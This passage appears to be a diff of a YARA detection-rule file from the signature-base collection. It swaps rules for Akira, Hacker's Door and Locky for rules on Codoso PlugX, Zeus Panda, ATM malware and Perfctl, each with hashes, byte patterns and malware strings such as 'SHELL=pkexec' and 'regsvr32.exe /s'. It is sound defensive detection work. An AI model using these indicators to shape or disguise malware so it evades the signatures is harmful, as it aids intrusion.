+		$c7 = "\\sysprep" wide
+		$c8 = "Global\\UN{5FFC0C8B-8BE5-49d5-B9F2-BCDC8976EE10}" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $s* ) and 3 of ( $S* ) and 1 of ( $u* )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 4 of ( $s* ) or 4 of ( $c* ) ) or 1 of ( $x* ) or 6 of ( $c* )
 }
-rule SIGNATURE_BASE_MAL_WIN_Akira_Apr25 : FILE
+rule SIGNATURE_BASE_Codoso_PGV_PVID_4 : FILE
 {
 	meta:
-		description = "This Yara rule from ISH Tecnologia's Heimdall Security Research Team detects key components of Akira Ransomware"
-		author = "0x0d4y-Icaro Cesar"
-		id = "76722cb6-70be-465f-9ef1-afd78f694289"
-		date = "2025-04-11"
-		modified = "2025-04-16"
-		reference = "https://ish.com.br/wp-content/uploads/2025/04/A-Anatomia-do-Ransomware-Akira-e-sua-expansao-multiplataforma.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_win_akira_apr25.yar#L1-L28"
+		description = "Detects Codoso APT PlugX Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c1c753a6-77b6-5bfb-89f9-16127c264fd0"
+		date = "2016-01-30"
+		modified = "2023-12-05"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_codoso.yar#L248-L275"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "205589629ead5d3c1d9e914b49c08589"
-		logic_hash = "112f844dff4c48d861f86736503da51e8fbc58805f463df1f9358781034f2e24"
-		score = 90
+		logic_hash = "f24100c0fe837511ce6144224eda397fed3931072e364f1b5be49c7bb4102aa4"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		rule_matching_tlp = "TLP:WHITE"
-		rule_sharing_tlp = "TLP:WHITE"
-		malpedia_family = "win.akira"
+		super_rule = 1
+		hash1 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75"
+		hash2 = "8a56b476d792983aea0199ee3226f0d04792b70a1c1f05f399cb6e4ce8a38761"
+		hash3 = "b2950f2e09f5356e985c38b284ea52175d21feee12e582d674c0da2233b1feb1"
+		hash4 = "b631553421aa17171cc47248adc110ca2e79eff44b5e5b0234d69b30cab104e3"
+		hash5 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe"
 
 	strings:
-		$code_custom_algorithm = { 44 8B CF 90 42 0F B6 4C 0D ?? 83 E9 4E 44 8D 04 89 45 03 C0 B8 09 04 02 81 41 F7 E8 41 03 D0 C1 FA 06 8B C2 C1 E8 1F 03 D0 6B C2 7F 44 2B C0 41 83 C0 7F B8 09 04 02 81 41 F7 E8 41 03 D0 C1 FA 06 8B C2 C1 E8 1F 03 D0 6B C2 7F 44 2B C0 46 88 44 0D ?? 49 FF C1 }
-		$code_aes_key_expansion = { 41 8D 41 FF 33 D2 8B 0C ?? 41 8B C1 41 F7 F2 85 D2 75 ?? 44 8B C1 0F B6 C1 0F B6 0C ?? 41 8B C0 48 C1 E8 ?? C1 E1 ?? 0F B6 04 ?? 0B C8 41 8B C0 48 C1 E8 ?? C1 E1 ?? 0F B6 D0 49 C1 E8 ?? 0F B6 04 ?? 0B C8 41 0F B6 C0 C1 E1 ?? 0F B6 14 ?? 0F B6 45 00 0B CA 33 C8 48 FF C5 }
-		$akira_str_I = "akira" ascii
-		$akira_str_II = "onion" ascii
-		$akira_str_III = "powershell" ascii
-		$akira_str_IV = "akira_readme.txt" ascii
+		$x1 = "dropper, Version 1.0" fullword wide
+		$x2 = "dropper" fullword wide
+		$x3 = "DROPPER" fullword wide
+		$x4 = "About dropper" fullword wide
+		$s1 = "Microsoft Windows Manager Utility" fullword wide
+		$s2 = "SYSTEM\\CurrentControlSet\\Services\\" ascii
+		$s3 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify" fullword ascii
+		$s4 = "<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\"><trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3" ascii
+		$s5 = "<supportedOS Id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"></supportedOS>" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $code_* ) and all of ( $akira_str_* )
+		uint16( 0 ) == 0x5a4d and filesize < 900KB and 2 of ( $x* ) and 2 of ( $s* )
 }
-
-rule SIGNATURE_BASE_Kaspermalware_Oct17_1 : FILE
+rule SIGNATURE_BASE_Codoso_Plugx_1 : FILE
 {
 	meta:
-		description = "Detects Kasper Backdoor"
+		description = "Detects Codoso APT PlugX Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7201d8ee-50ee-5a5c-a5b8-ee36c78b0d6e"
-		date = "2017-10-24"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_kasper_oct17.yar#L13-L30"
+		id = "af777818-5cff-5571-b5e9-0f5a4c8b08ff"
+		date = "2016-01-30"
+		modified = "2023-12-05"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_codoso.yar#L276-L294"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "15758407fb3039f1453f13d579d7df9525645e4717078f6b1fa482ab335e3a56"
+		logic_hash = "34736c85699a94b1413e5f9934e1a55841e8296df61d558bccf2d477e545d156"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "758bdaf26a0bd309a5458cb4569fe1c789cf5db087880d6d1676dec051c3a28d"
+		super_rule = 1
+		hash1 = "0b8cbc9b4761ab35acce2aa12ba2c0a283afd596b565705514fd802c8b1e144b"
+		hash2 = "448711bd3f689ceebb736d25253233ac244d48cb766834b8f974c2e9d4b462e8"
+		hash3 = "fd22547497ce52049083092429eeff0599d0b11fe61186e91c91e1f76b518fe2"
 
 	strings:
-		$x1 = "\\Release\\kasper.pdb" ascii
-		$x2 = "C:\\D@oc@um@en@ts a@nd Set@tings\\Al@l Users" wide
+		$s1 = "GETPASSWORD1" fullword ascii
+		$s2 = "NvSmartMax.dll" fullword ascii
+		$s3 = "LICENSEDLG" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 7000KB and ( pe.imphash ( ) == "2bceb64cf37acd34bc33b38f2cddfb61" or 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and all of them
 }
-
-rule SIGNATURE_BASE_Hkdoor_Backdoor_Dll : FILE
+rule SIGNATURE_BASE_Codoso_PGV_PVID_3
 {
 	meta:
-		description = "Hacker's Door Backdoor DLL"
-		author = "Cylance Inc."
-		id = "470e5d37-8a5a-500f-b9b9-245b8dc2c4d7"
-		date = "2023-12-05"
+		description = "Detects Codoso APT PGV PVID Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "08003dba-1201-5f74-9edd-ea321bb26e99"
+		date = "2016-01-30"
 		modified = "2023-12-05"
-		reference = "https://www.cylance.com/en_us/blog/threat-spotlight-opening-hackers-door.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hkdoor.yar#L11-L30"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_codoso.yar#L295-L314"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "77901d1f2d6c53161c79b50ef20eeb424bf1b8b32906302ca10f3c4b82a58e2a"
+		logic_hash = "371a91b08747b8025baba79797baf9f29487f9c3541f27fc2c2716b531d30b54"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "126fbdcfed1dfb31865d4b18db2fb963f49df838bf66922fea0c37e06666aee1"
+		hash2 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75"
+		hash3 = "8a56b476d792983aea0199ee3226f0d04792b70a1c1f05f399cb6e4ce8a38761"
+		hash4 = "b2950f2e09f5356e985c38b284ea52175d21feee12e582d674c0da2233b1feb1"
+		hash5 = "b631553421aa17171cc47248adc110ca2e79eff44b5e5b0234d69b30cab104e3"
+		hash6 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe"
 
 	strings:
-		$s1 = "The version of personal hacker's door server is" fullword ascii
-		$s2 = "The connect back interval is %d (minutes)" fullword ascii
-		$s3 = "I'mhackeryythac1977" fullword ascii
-		$s4 = "Welcome to http://www.yythac.com" fullword ascii
-		$s5 = "SeLoadDriverPrivilege" fullword ascii
+		$x1 = "Copyright (C) Microsoft Corporation.  All rights reserved.(C) 2012" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 3 of ( $s* ) ) and pe.characteristics & pe.DLL and pe.imports ( "ws2_32.dll" , "WSAStartup" ) and pe.imports ( "ws2_32.dll" , "sendto" )
+		$x1
 }
-rule SIGNATURE_BASE_Hkdoor_Backdoor : FILE
+rule SIGNATURE_BASE_Codoso_PGV_PVID_2 : FILE
 {
 	meta:
-		description = "Hacker's Door Backdoor"
-		author = "Cylance Inc."
-		id = "470e5d37-8a5a-500f-b9b9-245b8dc2c4d7"
-		date = "2023-12-05"
+		description = "Detects Codoso APT PGV PVID Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e4c00806-3092-5ec2-844f-b638c31fa6a5"
+		date = "2016-01-30"
 		modified = "2023-12-05"
-		reference = "https://www.cylance.com/en_us/blog/threat-spotlight-opening-hackers-door.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hkdoor.yar#L32-L51"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_codoso.yar#L315-L337"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3fc71c971bf0908e044e3e0ec3f266b8dfaae33bcfbf1b10619375fc7b5e7f5e"
+		logic_hash = "7eab3d398b5172127383047de7106a9713ec5b149f8e8ca1506b3382b007f648"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75"
+		hash2 = "b631553421aa17171cc47248adc110ca2e79eff44b5e5b0234d69b30cab104e3"
+		hash3 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe"
 
 	strings:
-		$s1 = "http://www.yythac.com" fullword ascii
-		$s2 = "Example:%s 192.168.1.100 139 -p yyt_hac -t 1" fullword ascii
-		$s3 = "password-----------The hacker's door's password" fullword ascii
-		$s4 = "It is the client of hacker's door %d.%d public version" fullword ascii
-		$s5 = "hkdoordll.dll" fullword ascii
-		$s6 = "http://www.yythac.com/images/mm.jpg" fullword ascii
-		$s7 = "I'mhackeryythac1977" fullword ascii
-		$s8 = "yythac.yeah.net" fullword ascii
+		$s0 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost" fullword ascii
+		$s1 = "regsvr32.exe /s \"%s\"" fullword ascii
+		$s2 = "Help and Support" fullword ascii
+		$s3 = "netsvcs" fullword ascii
+		$s9 = "%SystemRoot%\\System32\\svchost.exe -k netsvcs" fullword ascii
+		$s10 = "winlogon" fullword ascii
+		$s11 = "System\\CurrentControlSet\\Services" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 4 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 907KB and all of them
 }
-
-rule SIGNATURE_BASE_Hkdoor_Dropper : FILE
+rule SIGNATURE_BASE_Codoso_PGV_PVID_1 : FILE
 {
 	meta:
-		description = "Hacker's Door Dropper"
-		author = "Cylance Inc."
-		id = "8c8171b9-6256-591a-8f74-abac1cb9a50b"
-		date = "2018-01-01"
-		modified = "2023-01-07"
-		reference = "https://www.cylance.com/en_us/blog/threat-spotlight-opening-hackers-door.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hkdoor.yar#L53-L79"
+		description = "Detects Codoso APT PGV PVID Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9487773a-01d9-558e-8866-b8a8650996ba"
+		date = "2016-01-30"
+		modified = "2023-12-05"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_codoso.yar#L339-L367"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "521836ff95142d276152687f7c36e8f503f168f101976022431efd13a6adf7e4"
+		logic_hash = "8cecf96c7732becf83eb900bc36fa44daee466da6b483ea4f8c25ae9aeffcb7b"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		super_rule = 1
+		hash1 = "41a936b0d1fd90dffb2f6d0bcaf4ad0536f93ca7591f7b75b0cd1af8804d0824"
+		hash2 = "58334eb7fed37e3104d8235d918aa5b7856f33ea52a74cf90a5ef5542a404ac3"
+		hash3 = "934b87ddceabb2063b5e5bc4f964628fe0c63b63bb2346b105ece19915384fc7"
+		hash4 = "ce91ea20aa2e6af79508dd0a40ab0981f463b4d2714de55e66d228c579578266"
+		hash5 = "e770a298ae819bba1c70d0c9a2e02e4680d3cdba22d558d21caaa74e3970adf1"
 
 	strings:
-		$s1 = "The version of personal hacker's door server is" fullword ascii
-		$s2 = "The connect back interval is %d (minutes)" fullword ascii
-		$s3 = "I'mhackeryythac1977" fullword ascii
-		$s4 = "Welcome to http://www.yythac.com" fullword ascii
-		$s5 = "SeLoadDriverPrivilege" fullword ascii
-		$s6 = "\\drivers\\ntfs.sys" ascii
-		$s7 = "kifes" fullword ascii
+		$x1 = "DRIVERS\\ipinip.sys" fullword wide
+		$s1 = "TsWorkSpaces.dll" fullword ascii
+		$s2 = "%SystemRoot%\\System32\\wiaservc.dll" fullword wide
+		$s3 = "/selfservice/microsites/search.php?%016I64d" fullword ascii
+		$s4 = "/solutions/company-size/smb/index.htm?%016I64d" fullword ascii
+		$s5 = "Microsoft Chart ActiveX Control" fullword wide
+		$s6 = "MSChartCtrl.ocx" fullword wide
+		$s7 = "{%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X}" fullword ascii
+		$s8 = "WUServiceMain" fullword ascii
+		$s9 = "Cookie: pgv_pvid=" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 4 of ( $s* ) ) and pe.number_of_resources > 0 and for any i in ( 0 .. pe.number_of_resources - 1 ) : ( pe.resources [ i ] . type_string == "B\x00I\x00N\x00" and uint16( pe.resources [ i ] . offset ) == 0x5A4D ) and pe.imports ( "KERNEL32.dll" , "FindResourceW" ) and pe.imports ( "KERNEL32.dll" , "LoadResource" )
+		( uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or 3 of them ) ) or 5 of them
 }
-
-rule SIGNATURE_BASE_Hkdoor_Driver : FILE
+rule SIGNATURE_BASE_ATM_Malware_XFSADM_1 : FILE
 {
 	meta:
-		description = "Hacker's Door Driver"
-		author = "Cylance Inc."
-		id = "50b763a9-6d4f-59dd-ba6c-27e2ae117523"
-		date = "2018-01-01"
-		modified = "2023-01-07"
-		reference = "https://www.cylance.com/en_us/blog/threat-spotlight-opening-hackers-door.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hkdoor.yar#L81-L99"
+		description = "Detects ATM Malware XFSADM"
+		author = "Frank Boldewin (@r3c0nst), modified by Florian Roth"
+		id = "7bd7e194-1cf1-5d12-809b-25aaf7f62ca3"
+		date = "2019-06-21"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/r3c0nst/status/1149043362244308992"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_atm_xfsadm.yar#L1-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "68ac505d67af5361f096529697e621c83a4628f21c213fcea6652905f87ebe00"
+		logic_hash = "f2c1761407c5e499be43e546badd27428821f828a470fd3e3dcddd08db04aaa5"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
+		hash1 = "2740bd2b7aa0eaa8de2135dd710eb669d4c4c91d29eefbf54f1b81165ad2da4d"
 
 	strings:
-		$s1 = "ipfltdrv.sys" fullword ascii
-		$s2 = "Patch Success." fullword ascii
-		$s3 = "\\DosDevices\\kifes" ascii
-		$s4 = "\\Device\\kifes" ascii
-		$s5 = {75 28 22 36 30 5b 4a 77 7b 58 4d 6c 3f 73 63 5e 38 47 7c 7d 7a 40 3a 41 2a 45 4e 44 79 64 67 6d 65 74 21 39 23 3c 20 49 43 69 4c 3b 31 57 2f 55 3e 26 59 62 61 54 53 5a 2d 25 78 35 5c 76 3d 34 27 6b 5f 72 2c 32 4f 2b 71 66 42 33 37 56 52 60 5d 29 4b 51 2e 6f 50 68 6e 6a 24 48 7e 46 70}
+		$Code1 = {68 88 13 00 00 FF 35 ?? ?? ?? ?? 68 CF 00 00 00 50 FF 15}
+		$Code2 = {68 98 01 00 00 50 FF 15}
+		$Mutex = "myXFSADM" wide
+		$MSXFSDIR = "C:\\Windows\\System32\\msxfs.dll" ascii
+		$XFSCommand1 = "WfsExecute" ascii
+		$XFSCommand2 = "WfsGetInfo" ascii
+		$PDB = "C:\\Work64\\ADM\\XFS\\Release\\XFS.pdb" ascii
+		$WindowName = "XFS ADM" wide
+		$FindWindow = "ADM rec" wide
+		$LogFile = "xfs.log" ascii
+		$TmpFile = "~pipe.tmp" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and pe.subsystem == pe.SUBSYSTEM_NATIVE and ( 4 of ( $s* ) )
+		uint16( 0 ) == 0x5A4D and filesize < 500KB and ( 4 of them or $PDB )
 }
-rule SIGNATURE_BASE_HKTL_FRP_Apr20_1
+rule SIGNATURE_BASE_Zeus_Panda : FILE
 {
 	meta:
-		description = "Detects FRP fast reverse proxy tool often used by threat groups"
+		description = "Detects ZEUS Panda Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "55483832-0e0b-5c28-8be5-dbd14ddb50e3"
-		date = "2020-04-07"
-		modified = "2022-11-03"
-		reference = "https://github.com/fatedier/frp"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_frp_proxy.yar#L2-L22"
+		id = "2786b1e0-37af-5595-a24b-56ef3cb928a7"
+		date = "2017-08-04"
+		modified = "2023-12-05"
+		reference = "https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_zeus_panda.yar#L11-L33"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "21f91fd99aed8b62d804504889c41ca77567fd345cf4ea0ef00161eefa9324a7"
-		score = 70
+		logic_hash = "63312763196259204dcee6b6c46ae1a16abeab0afabbce9e2e8413131856b04e"
+		score = 75
 		quality = 85
-		tags = ""
-		hash1 = "05537c1c4e29db76a24320fb7cb80b189860389cdb16a9dbeb0c8d30d9b37006"
-		hash2 = "08c685c8febb5385f7548c2a64a27bae7123a937c5af958ebc08a3accb29978d"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "bd956b2e81731874995b9b92e20f75dbf67ac5f12f9daa194525e1b673c7f83c"
 
 	strings:
-		$x1 = "frp/vendor/github.com/spf13/" ascii
-		$x2 = "github.com/fatedier/frp/vendor/" ascii
-		$fpg2 = "<html"
-		$fpg3 = "<HTML"
-		$fpg6 = "<?xml"
+		$x1 = "SER32.dll" fullword ascii
+		$x2 = "/c start \"\" \"%s\"" fullword wide
+		$x3 = "del /F \"%s\"" fullword ascii
+		$s1 = "bcdfghklmnpqrstvwxz" fullword ascii
+		$s2 = "=> -,0;" fullword ascii
+		$s3 = "Yahoo! Slurp" fullword ascii
+		$s4 = "ZTNHGET ^&" fullword ascii
+		$s5 = "MSIE 9" fullword ascii
+		$s6 = "%s%08x.%s" fullword wide
 
 	condition:
-		1 of ( $x* ) and not 1 of ( $fp* )
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 2 of ( $x* ) or 4 of them )
 }
-rule SIGNATURE_BASE_HKTL_FRP_INI_Apr20_1 : FILE
+rule SIGNATURE_BASE_SUSP_Certificate_Payload : FILE
 {
 	meta:
-		description = "Detects FRP fast reverse proxy tool INI file often used by threat groups"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5c652c9c-715d-5ba5-821a-3e533b1e78c6"
-		date = "2020-04-07"
+		description = "Detects payloads that pretend to be certificates"
+		author = "Didier Stevens, Florian Roth"
+		id = "6f1fe410-591a-5a59-a683-67cad9777dfe"
+		date = "2018-08-02"
 		modified = "2023-12-05"
-		reference = "Chinese Hacktools OpenDir"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_frp_proxy.yar#L24-L44"
+		reference = "https://blog.nviso.be/2018/08/02/powershell-inside-a-certificate-part-3/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cert_payloads.yar#L1-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cc997dc876d7a49292b62a0fb4ff12b34dacacfd8a1b90226d6a9aee303cacdf"
-		score = 60
+		logic_hash = "909cf4209bbb876a042d86e017f65ce3764d2fde7a602406ed8531ba97c9fb9b"
+		score = 50
 		quality = 85
 		tags = "FILE"
-		hash1 = "1dabef3c170e4e559c50d603d47fb7f66f6e3da75a65c3435b18175d6e9785bb"
 
 	strings:
-		$h1 = "[common]" ascii
-		$s1 = "server_addr =" ascii fullword
-		$s2 = "remote_port =" ascii fullword
-		$s3 = "[RemoteDesktop]" ascii fullword
-		$s4 = "local_ip = " ascii
-		$s5 = "type = tcp" ascii fullword
+		$re1 = "-----BEGIN CERTIFICATE-----"
+		$fp1 = "replace it with the PEM-encoded root certificate"
 
 	condition:
-		uint16( 0 ) == 0x635b and filesize < 1KB and $h1 at 0 and all of them
+		uint32( 0 ) == 0x2D2D2D2D and $re1 at 0 and not uint8( 29 ) == 0x4D and not uint8( 28 ) == 0x4D and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_SUSP_EXPL_LIBCUE_CVE_2023_43641_Oct23_1 : CVE_2023_43641 FILE
+rule SIGNATURE_BASE_MAL_EXPL_Perfctl_Oct24 : FILE
 {
 	meta:
-		description = "Detects a suspicious .cue file that could be an exploitation attempt of libcue vulnerability CVE-2023-43641"
+		description = "Detects exploits used in relation with Perfctl malware campaigns"
 		author = "Florian Roth"
-		id = "34fcf80c-adcd-55c0-9fb4-261d20f61fa6"
-		date = "2023-10-27"
-		modified = "2023-12-05"
-		reference = "https://github.com/github/securitylab/blob/main/SecurityExploits/libcue/track_set_index_CVE-2023-43641/README.md"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_libcue_cve_2023_43641.yar#L2-L17"
+		id = "1f525eaf-445c-592e-bfa4-e9846390dd1d"
+		date = "2024-10-09"
+		modified = "2024-12-12"
+		reference = "https://www.aquasec.com/blog/perfctl-a-stealthy-malware-targeting-millions-of-linux-servers/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_perfctl_oct24.yar#L2-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a2cd3c1b0b3551ffb24bf7704c37c1be6c1a9655c74447d2f7f94540dd0ab188"
-		score = 70
+		logic_hash = "44d4683efc66b3c6c2d32be6b83a2bbc1db39c9a020365dddd27c20667bc6a66"
+		score = 80
 		quality = 85
-		tags = "CVE-2023-43641, FILE"
+		tags = "FILE"
+		hash1 = "22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13"
 
 	strings:
-		$a1 = "TRACK "
-		$a2 = "FILE "
-		$s1 = "INDEX 4294"
+		$s1 = "Exploit failed. Target is most likely patched." ascii fullword
+		$s2 = "SHELL=pkexec" ascii fullword
+		$s3 = "/dump_" ascii fullword
+		$s4 = ".EYE$" ascii
 
 	condition:
-		filesize < 100KB and all of them
+		uint16( 0 ) == 0x457f and filesize < 30000KB and 2 of them or all of them
 }
-rule SIGNATURE_BASE_Locky_Ransomware
+rule SIGNATURE_BASE_MAL_LNX_Perfctl_Oct24 : FILE
 {
 	meta:
-		description = "Detects Locky Ransomware (matches also on Win32/Kuluoz)"
-		author = "Florian Roth (Nextron Systems) (with the help of binar.ly)"
-		id = "ce61e01e-a9ce-54f4-bd2d-8acf1d5fbc30"
-		date = "2016-02-17"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/qScSrE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_locky.yar#L8-L21"
+		description = "Detects Perfctl malware samples"
+		author = "Florian Roth"
+		id = "391513ae-3348-5297-a22a-6f06e50f06d2"
+		date = "2024-10-09"
+		modified = "2024-12-12"
+		reference = "https://www.aquasec.com/blog/perfctl-a-stealthy-malware-targeting-millions-of-linux-servers/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_perfctl_oct24.yar#L23-L42"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5e945c1d27c9ad77a2b63ae10af46aee7d29a6a43605a9bfbf35cebbcff184d8"
-		logic_hash = "c7584ea39c4aceedeb0ea2952be6ff212461674175855274f1783eef80ffba86"
+		logic_hash = "d47df34240f59124542acc41484e8935327490c04c4e15a558b2ffc6f9c52ea8"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "a6d3c6b6359ae660d855f978057aab1115b418ed277bb9047cd488f9c7850747"
+		hash2 = "ca3f246d635bfa560f6c839111be554a14735513e90b3e6784bedfe1930bdfd6"
 
 	strings:
-		$o1 = { 45 b8 99 f7 f9 0f af 45 b8 89 45 b8 }
-		$o2 = { 2b 0a 0f af 4d f8 89 4d f8 c7 45 }
+		$op1 = { 83 45 f8 01 8b 45 f8 48 3b 45 98 0f 82 1b ff ff ff 90 c9 c3 55 }
+		$op2 = { 48 8b 55 a0 48 01 ca 0f b6 0a 48 8b 55 a8 89 c0 88 4c 02 18 8b 45 fc 83 e0 3f }
+		$op3 = { 88 4c 10 58 83 45 f8 01 83 7d f8 03 0f 86 68 ff ff ff 90 c9 c3 55 }
+		$op4 = { 48 83 ec 68 48 89 7d a8 48 89 75 a0 48 89 55 98 48 8b 45 a8 48 8b 00 83 e0 3f 89 45 fc }
 
 	condition:
-		all of ( $o* )
+		uint16( 0 ) == 0x457f and filesize < 300KB and 2 of them
 }
-rule SIGNATURE_BASE_Turla_Png_Dropper : FILE
+rule SIGNATURE_BASE_Apt_Nix_Elf_Derusbi_1 : FILE
 {
 	meta:
-		description = "Detects the PNG Dropper used by the Turla group"
-		author = "Ben Humphrey"
-		id = "459f17c8-0eae-5736-8c7c-286625dc158f"
-		date = "2018-11-23"
-		modified = "2023-12-05"
-		reference = "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla_png_dropper_nov18.yar#L3-L49"
+		description = "Detects Derusbi Backdoor ELF"
+		author = "Fidelis Cybersecurity"
+		id = "c825c5d6-1c2f-5ee7-871e-4be3f41d73f7"
+		date = "2016-02-29"
+		modified = "2023-05-04"
+		reference = "https://github.com/fideliscyber/indicators/tree/master/FTA-1021"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turbo_campaign.yar#L1-L49"
